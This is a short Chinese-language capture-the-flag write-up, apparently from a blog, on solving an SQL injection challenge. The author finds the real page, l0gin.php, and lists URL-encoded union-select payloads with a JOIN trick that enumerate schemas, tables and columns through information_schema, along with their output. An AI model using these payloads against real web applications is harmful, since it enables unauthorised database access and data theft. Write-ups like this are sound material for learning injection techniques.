SQLi

作者: Yix1a | 来源:发表于2019-06-02 21:25 被阅读0次

这个题有一点坑。。

首先发现源代码有提示login.php?id=1,结果尝试了半天也没能注入。

后来发现index.php存在,并且header中发现正真的登录页面l0gin.php....擂主还是有点坑。

/l0gin.php?id=0%27%20union%20select%20*%20from%20(%20(select%20user())a%20JOIN%20(select%20group_concat(schema_name)%20from%20information_schema.schemata)b)%20%23 

information_schema,sqli


/l0gin.php?id=0%27%20union%20select%20*%20from%20(%20(select%20user())a%20JOIN%20(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3d'sqli')b)%20%23 


users

/l0gin.php?id=0%27%20union%20select%20*%20from%20(%20(select%20user())a%20JOIN%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%3d'users')b)%20%23  


>id,username,flag_9c861b688330</td id,username,flag_9c861b688330

相关文章

网友评论

      本文标题:SQLi

      本文链接:https://www.haomeiwen.com/subject/sjjfxctx.html